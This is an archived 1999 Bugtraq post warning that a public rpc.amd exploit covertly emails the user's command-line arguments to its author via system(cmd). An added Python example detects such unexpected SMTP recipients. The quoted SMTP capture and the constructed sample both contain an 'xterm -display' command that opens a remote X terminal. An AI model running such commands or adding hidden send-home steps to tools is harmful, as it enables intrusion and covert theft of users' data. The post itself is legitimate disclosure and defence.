Bugtraq mailing list archives
Re: Amd exploit
From: omri () INAME COM (Locke Montana)
Date: Sat, 4 Sep 1999 05:21:42 -0000
Hello,
Sorry if this was already known.
Recently someone named Taeho Oh published an exploit
for a buffer overflow in rpc.amd (automount).
While testing this exploit on my own server, I saw
that I was opening a connection to ohhara.postech.ac.kr
on port 25. After a little research I found out that
the exploit (in its original form) was sending an email to
abuser () ohhara postech ac kr and listing the arguments I
just entered.
There is an easy way to stop it from sending:
just comment out the line: system(cmd);
Here's the log as I got it from sniffit:
EHLO BlackMesa.com
MAIL From:<locke () BlackMesa com> SIZE=95
RCPT To:<abuser () ohhara postech ac kr>
DATA
Received: (from root@localhost)
        by BlackMesa.com (8.9.3/8.9.3) id FAA01208
        for abuser () ohhara postech ac kr; Sat, 4 Sep 1999 05:30:56 +0200
Date: Sat, 4 Sep 1999 05:30:56 +0200
From: locke <locke () BlackMesa com>
Message-Id: <199909040330.FAA01208 () BlackMesa com>
To: abuser () ohhara postech ac kr
10.0.0.9 /usr/X11R6/bin/xterm -display 10.0.0.8:0
.
QUIT
QUIT
(IPs changed to protect the innocent)
Bye
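
Added example, not part of the original post: a way to check a captured client-side SMTP session, like the sniffit log above, for mail sent to recipients outside the domains a test host is expected to mail. The function names, the allowlist and the sample capture (documentation addresses) are assumptions constructed for this illustration.

```python
import re

# Client envelope commands; case-insensitive because captures show "MAIL From:".
ENVELOPE = re.compile(r"^(MAIL FROM|RCPT TO):\s*<([^>]*)>", re.IGNORECASE)

def parse_smtp_client(lines):
    """Split the client side of an SMTP session into messages."""
    messages, current, in_data = [], None, False
    for raw in lines:
        line = raw.rstrip("\r\n")
        if in_data:
            if line == ".":                      # lone dot terminates DATA
                messages.append(current)
                current, in_data = None, False
            else:                                # undo dot-stuffing
                current["data"].append(line[1:] if line.startswith(".") else line)
            continue
        m = ENVELOPE.match(line)
        if m and m.group(1).upper() == "MAIL FROM":
            current = {"from": m.group(2), "rcpt": [], "data": []}
        elif m and current is not None:
            current["rcpt"].append(m.group(2))
        elif line.upper() == "DATA" and current is not None:
            in_data = True
    return messages

def body_of(message):  # lines after the first blank line, i.e. headers removed
    data = message["data"]
    return data[data.index("") + 1:] if "" in data else data

def unexpected_mail(messages, allowed_domains):
    """List (recipient, body) for envelope recipients outside allowed_domains."""
    allowed = {d.lower() for d in allowed_domains}
    return [(rcpt, body_of(msg))
            for msg in messages for rcpt in msg["rcpt"]
            if rcpt.rpartition("@")[2].lower() not in allowed]

# Constructed capture (documentation addresses, not the values from the post).
SAMPLE = """\
EHLO lab.example.net
MAIL From:<tester@lab.example.net> SIZE=95
RCPT To:<collector@example.org>
DATA
To: collector@example.org

192.0.2.9 /usr/X11R6/bin/xterm -display 192.0.2.8:0
.
QUIT
""".splitlines()
```

Calling `unexpected_mail(parse_smtp_client(SAMPLE), {"lab.example.net"})` reports the outside recipient together with the message body, which is where the command-line arguments appear in the log above.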
